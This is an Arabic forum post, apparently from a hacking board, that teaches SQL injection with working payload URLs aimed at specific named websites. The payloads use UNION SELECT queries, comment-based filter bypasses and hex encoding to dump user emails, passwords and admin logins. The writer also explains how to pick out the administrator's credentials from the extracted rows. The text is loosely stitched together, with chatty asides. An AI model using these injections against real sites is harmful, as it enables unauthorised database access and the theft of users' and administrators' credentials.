الحقنة
كود:http://www.thecompletepianist.com/material.php?id=-18 UNION SELECT 1,2,group_concat(email,char(58),password),4,5,6,7,8 from users --
الايميل ~> لانة يتم الدخول عن طريق الايميل والباسوورد
ممممممممممممممممممممممممم واش راح نقولك خو
/*!
و
*/http://www.avmaniacs.com/review.php?id=-1472+UNION+/*!SELECT*/+version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
assword:seseشوف اخي
id هي رقم العضوية مش هي اليوزر
شوف اخي نفرض مثلا اننا حقنا موقع وطلع معانا اليوزر
مثلا راح نلقى
user:id:system
هنا id هي لمعرفة رقم العضوية ودائما رقم العضوية يكون 1
مثلا نفرض اننا بدنا جدول اليوزر الي راح يطلعلنا اسم الادمن
راح نلقى مثلا
user:username:sest
هنا username هي الي راح طلعلنا اسم الادمن
مثلا احنا طلعو معانا كذا
user:id:sese
user:username:ses
user
ومثلا احنا حطينا حقنة وطلو معانا اعضاء كثير كيف راح نعرف الادمن فيهم هنا لازم نستعمل id
راح يكون الاستغلال كذا
concat(username,0x3a,id,0x3a,password)5,6,7+from+user
هنا
username راح يطلعلنا الاسماء
id راح يطلعلنا رقم العضويات
password راح يطلعلنا باسوردات
يعني يوزر وباس الادمن دائما نلاقيهم هيك مثلا
admin:1:123456
اتمنى تكون وصلت الفكرة
اخوك عبد الصمد
http://www.avmaniacs.com/review.php?id=-696 /*!UNION*//*!SELECT*/ unhex(hex(group_CONCAT(AdminAccountsID,0x3a,login,0x3a,password))),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+AdminAccounts--